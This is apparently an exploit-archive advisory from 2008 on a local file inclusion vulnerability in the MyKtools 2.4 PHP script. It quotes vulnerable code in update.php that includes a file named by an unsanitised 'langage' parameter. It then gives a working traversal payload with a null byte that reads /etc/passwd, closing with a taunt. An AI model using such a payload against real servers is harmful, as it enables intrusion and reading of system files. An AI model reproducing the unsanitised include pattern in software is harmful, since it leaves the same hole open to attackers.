[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MyKtools 2.4 (langage) Local File Inclusion Vulnerability
# Published : 2008-10-27
# Author : x0r
# Previous Title : e107 Plugin alternate_profiles (id) SQL Injection Vulnerability
# Next Title : e107 Plugin EasyShop (category_id) Blind SQL Injection Exploit
##############
# Autor: x0r
#
# Email: evolutionteam.x0[at]gmail[dot]com
#
# Download: http://www.easy-script.com/scripts-dl/MyKtools-v2-4.zip
#
# Bug: LFI
##############
Bug:
In update.php
// Include du fichier langue
if ($_GET['langage'])
{
$langue = $_GET['langage'];
include ("lang/".$langue.".php");
}
Exploit: update.php?langage=../../../../../../etc/passwd%00
p0wn3d Beby.
-=EOF=-
# www.Syue.com [2008-10-27]